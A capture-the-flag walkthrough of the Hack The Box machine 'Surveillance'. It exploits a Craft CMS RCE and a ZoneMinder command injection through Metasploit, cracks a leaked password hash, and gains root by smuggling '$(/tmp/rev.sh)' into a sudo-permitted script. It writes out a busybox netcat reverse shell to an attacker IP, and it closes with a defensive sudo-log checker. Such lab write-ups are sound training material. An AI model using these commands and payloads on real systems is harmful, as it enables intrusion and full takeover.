# Surveillance

{% embed url="<https://app.hackthebox.com/machines/Surveillance>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

We start with an Nmap scan and find only two open ports: 22 (SSH) and a web server on port 80.

<figure><img src="/files/TTpZfltPvCbl2rNBI9R6" alt=""><figcaption></figcaption></figure>

When enumerating directories, we find nothing of note except the `/admin` directory.

<figure><img src="/files/ebF3cCgoagjrwGG2RaES" alt=""><figcaption></figcaption></figure>

The main site has nothing else to offer us in the way of entry points.

<figure><img src="/files/J3AyvUPOrmWReEWQwV75" alt=""><figcaption></figcaption></figure>

When we look at the `/admin` page, we see that we are dealing with Craft CMS.

<figure><img src="/files/FphiftWrqUulaJA3aPtu" alt=""><figcaption></figcaption></figure>

Looking through the source of the index page, we see that the Craft CMS version is `4.4.14`.

<figure><img src="/files/ghyvcgU3JPZWEXSHASIa" alt=""><figcaption></figcaption></figure>

We can get an idea of the CMS on GitHub:

{% embed url="<https://github.com/craftcms/cms/tree/4.4.14>" %}

This seems to be a very old version, so we probably have an entry point into the system after all. Let's take a look at which vulnerabilities exist for it.

<figure><img src="/files/eQv86CVRdUSnPCeUiCVW" alt=""><figcaption></figcaption></figure>

## Shell as www-data

{% embed url="<https://blog.calif.io/p/craftcms-rce>" %}

This Craft CMS version has an unauthenticated remote code execution vulnerability, `CVE-2023-41892`.

<figure><img src="/files/3kUlrVwx4DDRPgCM3ALk" alt=""><figcaption></figcaption></figure>

The following gist contains a POC, which unfortunately did not work right away:

{% embed url="<https://gist.github.com/gmh5225/8fad5f02c2cf0334249614eb80cbf4ce>" %}

Looking at the Craft CMS documentation, we see that the exploit does not take the resource base path into account. We have to adjust this in the POC.

<figure><img src="/files/ewEEoAqJ2NU9zD1Jggsl" alt=""><figcaption></figcaption></figure>

We make the following adjustments:

<figure><img src="/files/O6brIpaKM1F9uY6tauVa" alt=""><figcaption></figcaption></figure>

Furthermore, the query for uploading seems to be defective.

<figure><img src="/files/y6CRfrcD6ssW5j1VnML5" alt=""><figcaption></figcaption></figure>

After customizing and executing the POC, we receive a web shell that we can conveniently use in the terminal. We are the user `www-data`. However, for the time being, we cannot find a flag in its home directory.

<figure><img src="/files/6GeZUEHRRcYuRkgAdvin" alt=""><figcaption></figcaption></figure>

Next, we upgrade our web shell to an interactive shell. We use `revshells.com` to generate a reverse shell payload.

<figure><img src="/files/CeiLEpy37zmK29FOZqvQ" alt=""><figcaption></figcaption></figure>

After our reverse shell connects...

<figure><img src="/files/lMalFcL94eXv5FVyVQRo" alt=""><figcaption></figcaption></figure>

... we upgrade the reverse shell:

{% embed url="<https://0xffsec.com/handbook/shells/full-tty/>" %}

<figure><img src="/files/pcP5WfPFxKWZI50Pvv6Q" alt=""><figcaption></figcaption></figure>

In addition to `www-data`, we also have the users `matthew` and `zoneminder`. Since we can't find a user flag as `www-data` we have to move laterally and get access to one of these users.

<figure><img src="/files/zjbtxieqiv5D9EsRMqbt" alt=""><figcaption></figcaption></figure>

## Shell as matthew

In `/html/craft/storage/backup`, we find a backup of a database, packed as a zip. This could contain sensitive information that could allow us to switch to one of the other users. We unpack the zip.

```
unzip surveillance--2023-10-17-202801--v4.4.14.sql.zip
```

<figure><img src="/files/AlQIXXiVsZFFxIATFDQG" alt=""><figcaption></figcaption></figure>

And search the file using `strings` and `grep`. We find what we are looking for when we search for `admin`: this reveals the password hash (SHA2-256) for `matthew`.

```
strings surveillance--2023-10-17-202801--v4.4.14.sql | grep admin
```

<figure><img src="/files/0Nbk1gBsphNoDk7Tt7hZ" alt=""><figcaption></figcaption></figure>

Using Hashcat, we crack the hash with the `1400` mode for SHA2-256.

<figure><img src="/files/kkqJZAfdLoVdxdtX8JLc" alt=""><figcaption></figcaption></figure>

Next, we log in via SSH with `matthew`'s credentials and find the user flag in the home directory.

<figure><img src="/files/1a26eKgaWr1z9RqI8rR4" alt=""><figcaption></figcaption></figure>

Linpeas reveals the installation of ZoneMinder. ZoneMinder is an open-source video surveillance software designed for monitoring and recording security cameras. It offers features such as motion detection, alerts, and remote access, allowing users to manage their security systems via a web interface or mobile app.

<figure><img src="/files/Tq0Ll93qUWhy5BwXpEmg" alt=""><figcaption></figcaption></figure>

When searching for files related to ZoneMinder, we discover that it was installed via dpkg. We can therefore determine which version it is.

<figure><img src="/files/1w9lQfoyLx1wvqVbKvbX" alt=""><figcaption></figcaption></figure>

Using `dpkg -s zoneminder | grep Version` we get the version `1.36.32`, for which many vulnerabilities exist, among them command injection. We will probably jump from `matthew` to `zoneminder`.

<figure><img src="/files/VI67TCBY8iEKSfTk2Qhu" alt=""><figcaption></figcaption></figure>

{% embed url="<https://www.cybersecurity-help.cz/vdb/SB2023030118>" %}

<figure><img src="/files/tgrHnt68BY1zT4vWh9T0" alt=""><figcaption></figcaption></figure>

## Shell as zoneminder

We start `msfconsole` and look around for possible exploits. Among them, we find `exploit/unix/webapp/zoneminder_snapshots` with command injection. We want to try this out. But we need access to the web interface. Maybe the instance is running internally.

<figure><img src="/files/kYEHgw4d15oxwozaJ3QR" alt=""><figcaption></figcaption></figure>

We run `netstat -tulnp` on the target and see that something is running on port 8000.

<figure><img src="/files/uaFS7S7ZTMRcnr0C5Ymf" alt=""><figcaption></figcaption></figure>

We forward the port via SSH.

<figure><img src="/files/oYluKUTy5OM7vmek4xJm" alt=""><figcaption></figcaption></figure>

And lo and behold, it is the ZoneMinder interface. We should now be able to get a reverse shell as `zoneminder` using msfconsole, assuming that the web service is running as the user `zoneminder`.

<figure><img src="/files/GfJ2QRz4S6Ou6IUeZ4wi" alt=""><figcaption></figcaption></figure>

We set up the options in msfconsole.

```
msf6 > use exploit/unix/webapp/zoneminder_snapshots
msf6 exploit(unix/webapp/zoneminder_snapshots) > set RHOSTS 127.0.0.1
msf6 exploit(unix/webapp/zoneminder_snapshots) > set RPORT 8000
msf6 exploit(unix/webapp/zoneminder_snapshots) > set LHOST 10.10.14.122
msf6 exploit(unix/webapp/zoneminder_snapshots) > set LPORT 4444
msf6 exploit(unix/webapp/zoneminder_snapshots) > set targeturi /
msf6 exploit(unix/webapp/zoneminder_snapshots) > run
```

After running the exploit, we get a meterpreter session. Spawning a shell reveals to us that we are indeed the user `zoneminder`.

<figure><img src="/files/i0Wwx7ciTkghnttwVNLq" alt=""><figcaption></figcaption></figure>

## Shell as root

When running `sudo -l`, we see that we can run all programs from `/bin` starting with `zm` and ending with `.pl` without a password. Furthermore, we can pass any arguments we want to these programs.

Here we could try command injection via command substitution. We familiarize ourselves with `zmupdate.pl` and see that we can also specify the user parameter. The `--user` switch sets the user variable inside the script. Placing a command substitution in that variable leads to the command being executed first when the script reaches the point where it evaluates the user.

It is important that we quote the parameter as a string, because a quoted `'$()'` is not expanded as a command substitution by our own shell. Otherwise the substitution would not be executed inside the script but in the context of the command we enter, by our own shell, and we would get a reverse shell as `zoneminder` and not as `root`.

<figure><img src="/files/yPAk9VIdcuzTc5JncL7f" alt=""><figcaption></figcaption></figure>

We prepare our reverse shell and set up a listener.

```
echo 'busybox nc 10.10.14.122 4446 -e sh' > /tmp/rev.sh
chmod +x /tmp/rev.sh
```

<figure><img src="/files/agBhJqEMhAcntDPF8lUU" alt=""><figcaption></figcaption></figure>

After running `sudo /usr/bin/zmupdate.pl --version 1.37 --user='$(/tmp/rev.sh)'` our reverse shell connects and we are the user `root`. In the home directory of the user we find the final flag.
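From the defender's side, the quoting trick above has a useful side effect: because the single quotes keep `$(...)` from being expanded by the invoking shell, sudo logs the literal substitution in its `COMMAND=` field. The following Python checker is an added example (not part of the original writeup) that parses sudo's syslog lines and flags privileged `zm*.pl` invocations carrying shell metacharacters or `/tmp` paths in their arguments; the log lines, host name and paths are constructed for this example.

```python
import re

# Constructed sample lines in the format sudo writes to syslog/auth.log.
# The host name, users and paths are made up for this example.
SAMPLE_LOG = """\
Dec 10 12:00:01 surveillance sudo: zoneminder : TTY=pts/1 ; PWD=/home/zoneminder ; USER=root ; COMMAND=/usr/bin/zmupdate.pl --version 1.37 --user=zmuser
Dec 10 12:00:05 surveillance sudo: zoneminder : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/zmupdate.pl --version 1.37 --user=$(/tmp/rev.sh)
Dec 10 12:00:09 surveillance sudo: zoneminder : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/zmaudit.pl --user=`id`
Dec 10 12:00:12 surveillance sudo: matthew : TTY=pts/0 ; PWD=/home/matthew ; USER=root ; COMMAND=/usr/bin/apt update
"""

# Pull the invoking user, the target user and the full command out of a sudo line.
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:.*?USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)
# Shell metacharacters that have no business in an argument to a privileged
# maintenance script: command substitution, backticks, variable expansion,
# command separators and pipes.
META_RE = re.compile(r"\$\(|`|\$\{|[;|&]|\$[A-Za-z_]")


def parse_sudo_line(line):
    """Return a dict with user/target/cmd for a sudo log line, else None."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    return {"user": m["user"], "target": m["target"], "cmd": m["cmd"].strip()}


def is_suspicious(entry):
    """True if a root-level zm*.pl call carries injection-style arguments."""
    cmd = entry["cmd"]
    prog = cmd.split()[0] if cmd else ""
    # Only the scripts covered by the wildcard sudo rule are of interest here.
    if not (prog.startswith("/usr/bin/zm") and prog.endswith(".pl")):
        return False
    args = cmd[len(prog):]
    return entry["target"] == "root" and (
        META_RE.search(args) is not None or "/tmp/" in args
    )


def find_suspicious(log_text):
    """Parse every line of a sudo log excerpt and return the flagged entries."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_sudo_line(line)
        if entry and is_suspicious(entry):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"{hit['user']} -> {hit['target']}: {hit['cmd']}")
```

The same check translates directly into a SIEM rule on the `COMMAND=` field of sudo events; restricting the sudoers entry to fixed arguments removes the root cause.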

<figure><img src="/files/DhYacihvEIiANthrYOTI" alt=""><figcaption></figcaption></figure>

